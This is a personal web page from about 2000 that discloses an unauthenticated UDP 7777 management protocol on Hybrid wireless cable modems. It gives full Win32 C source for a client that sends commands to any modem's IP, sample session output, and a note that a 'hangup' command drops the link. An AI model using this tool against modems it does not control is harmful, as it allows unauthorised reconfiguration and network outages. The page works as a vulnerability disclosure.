loopy.org:

navigation:
home

cisco security

hybrid security

yahoo hacking

c unleashed

mp3

links

ccie

me

email loopy@loopy.org
hybrid security:

I should preface this document with the following information. I no longer have a Hybrid Modem.  I no longer even live in a city that offers a Wireless option.  Due to these reasons, this document is no longer supported.  Please don't email asking questions that are not answered here as I have no way to answer them.  

 

Anyway, a few years ago, I went looking for a faster home Internet connection. I was outside the reach of any DSL carrier and the Road Runner service from Warner wasn't supported in my neighborhood. Not being able to stomach shelling out $1200 a month for a T1, my choices were pretty slim. I wound up going with a company called Accelernet.

It is essentially a wireless Cable modem. They employ antennas to broadcast the data to your location. It wasn't the most perfect thing in the world, but it seemed to fit my immediate needs.

Part of their equipment was a router / modem produced by a company called Hybrid. Given my curiosity and profession it was only a matter of time until I began looking at what made it tick, and more importantly, how to manipulate that ticking.

The ftp server hybrid runs had an application they developed called CCMInfo. It was a client server application that communicated with the Cable modem and returned diagnostic information such as signal strength, carrier voltage etc.

Within minutes I had a sniffer capturing the data that was being transferred across the network. What I found was scary.

It seems these Hybrid routers have a diagnostic / management port open with no authentication in place. This network "feature" was UDP based and everything was sent clear text over the LAN.

Tsk, tsk, this is crappy engineering at it's finest.

 

The Hybrid box listens on UDP 7777 for any packets that it recognizes, then replies to the sender a response. It seemed the device would acknowledge every packet regardless of what you sent it.

At this point, I went searching the web for information on this type of device and hopefully this protocol. I stumbled across an application called Hybridcon. This was nothing more than a dummy app to act as a console for the router, it produced a shell like effect echoing STDIN via UDP and echoing the received packets via STDOUT. The particular app was written for a Unix host, I quickly made some modifications and ported it to windows.

The following code is not entirely ANSI C, but a client server application written for a win32 environment. Specifically it needs Winsock to handle the TCP/IP functions. This code is free for anyone to use under the GPL license.

Due to several request for a compiled version of this code, here is a win32 exe.

Frank Varnavas has contributed a Perl version of this application as well, click here to download.

  



#include <stdio.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <stdlib.h>


#define PRINTERROR(s) fprintf(stderr,"\n%: %d\n", s,
WSAGetLastError())


SOCKET theSocket;
SOCKADDR_IN saServer;
LPHOSTENT lpHostEntry;

int sendcmd(char *cmd);
int docmd(char *cmd);



int main(int argc, char **argv)
{
 WORD wVersionRequested = MAKEWORD(1,1);
 WSADATA wsaData;
 char inbuf[1500]={0};
 int keepgoing=1;

 if (argc != 2)
  {
   fprintf(stderr,"\nSyntax: App IP\n");
   return 0;
  }
 WSAStartup(wVersionRequested, &wsaData);
 if (wsaData.wVersion != wVersionRequested)
  {
   fprintf(stderr,"\n Wrong version\n");
   return 0;
  }
  lpHostEntry = gethostbyname(argv[1]);
  if (lpHostEntry == NULL)
  {
   PRINTERROR("gethostbyname()");
   return 0;
  }
  theSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  if (theSocket == INVALID_SOCKET)
   {
    PRINTERROR("socket()");
    return 0;
   }
   saServer.sin_family = AF_INET;
   saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
   saServer.sin_port = htons(7777);

   while(keepgoing)
    {
     memset(inbuf, 0, sizeof inbuf);
     printf("[...] ");
     fgets(inbuf, 1024, stdin);
     if (strlen(inbuf))
      {
        if (!strncmp("exit", inbuf, 4))
        keepgoing = 0;
        else
         {
          inbuf[strlen(inbuf)-1] = '\0';
          if (strlen(inbuf))
           {
            docmd(inbuf);
           }
         }
       }
     }
    closesocket(theSocket);
    WSACleanup();
    return 0;
}


int sendcmd(char *cmd)
{
  int framelen;
  unsigned char *frame;
  unsigned char hdr[] = {
    0x00, 0x00, 0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x01, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x0f, 0x0a };

  framelen = 20 + 2 + 6 + strlen(cmd) + 1;
  frame = (unsigned char *)calloc(1, framelen);
  memcpy(frame, hdr, 20);
  frame[20] = (strlen(cmd)>>8) & 0xff;
  frame[21] = strlen(cmd) & 0xff;
  /* 22 - 27 assumed NULL */
  memcpy(frame+28, cmd, strlen(cmd));
  return sendto(theSocket, frame, framelen, 0,(LPSOCKADDR)&saServer,
                sizeof(struct sockaddr));

}

int docmd(char *cmd)
{
  char readbuf[1500]={0};
  int n;
  if (sendcmd(cmd)<0)
  {
   perror("sendcmd");
   exit(-1);
  }
  if ((n = recvfrom(theSocket, readbuf, sizeof(readbuf), 0, NULL,
NULL))<0)
  {
   perror("recvfrom");
   exit(-1);
  }
  readbuf[n] = '\0';

  printf("%s\n", readbuf+18);
  return 0;
}




Now, to use aplication, we simply run the executable with the IP address as the parameter.

c:\hybrid.exe 111.111.111.111
[...] version

HSMP transid 105 cmd [version]

Net time Sat Jul 22 03:58:12 2000

Hybrid NOS version 70918 Id 130167 Model 1WBR-O Configuration [955124260]

[...] ifco seeq0

HSMP transid 105 cmd [ifco seeq0]

seeq0 IP addr 111.111.111.111 MTU 1514

Link encap ethernet

Link addr 00:20:cd:01:fc:77

trace 0x0

netmask 0xffffff00

broadcast 111.111.111.255

sent: ip 5598 tot 8005 idle 4:03:13:13 qlen 0

recv: ip 11368 tot 0 idle 4:03:13:13

[...] qamstat

HSMP transid 105 cmd [qamstat]

QAM: in LOCK FEC: in LOCK SNRE: 0x03a4 F7: 0x5781

AGC: 1.93V BAUD: 2.40V CARRIER: 2.50V DEROTATOR: 46.2 KHz

RVRS0: 0x5a420100 RVRS1: 0x2000c000

i2cW=79076(rtry=0) i2cR=232688(rtry=0)

[...]

Note - The above section gives us some very useful information about the line strenght and quality. The QAM in lock means it has a solid signal and is able to receive data. The next two pieces of information are very helpful digits. It represents the Signal to Noise Estimated Ratio in db. This is a solid way to determine the signal strenght of your antenna. You have to do a bit of hex to dec conversion to get it, but that's simple enough. It is a sum of the two digits / 1000.

0x03a4 = 932

0x5781 = 22401

Total = 23333 / 1000

Signal Quality = 23.34 db

Signal Strenght = 1.93V

 

 

Try various other commands.

ifco is an ifconfig equivilent, it can be used on all of the internal routing interfaces. seeq0, seeq1, sl0, etc.

ee rf setup, or asys lead to some interesting information, as do many more. Experimentation is a wonderful thing here. Have fun.

Something I found a little disturbing was that this box actually supports sending it a line of hangup. This drops the return path side effectively killing the interface, thus killing the route and your network.

PS - if you do type in hangup and want to get it back without rebooting the box, try connect default. Not only will it reconnect you, but it will dump the session information to the screen, ie, number dialed with AT strings, connection speed, etc.

 

So, the ugly bottom line is that by using the HSMP UDP protocol, any Hybrid router can be reconfigured or downed at any time by any person on the internet. That is, as we network people say, pure crap.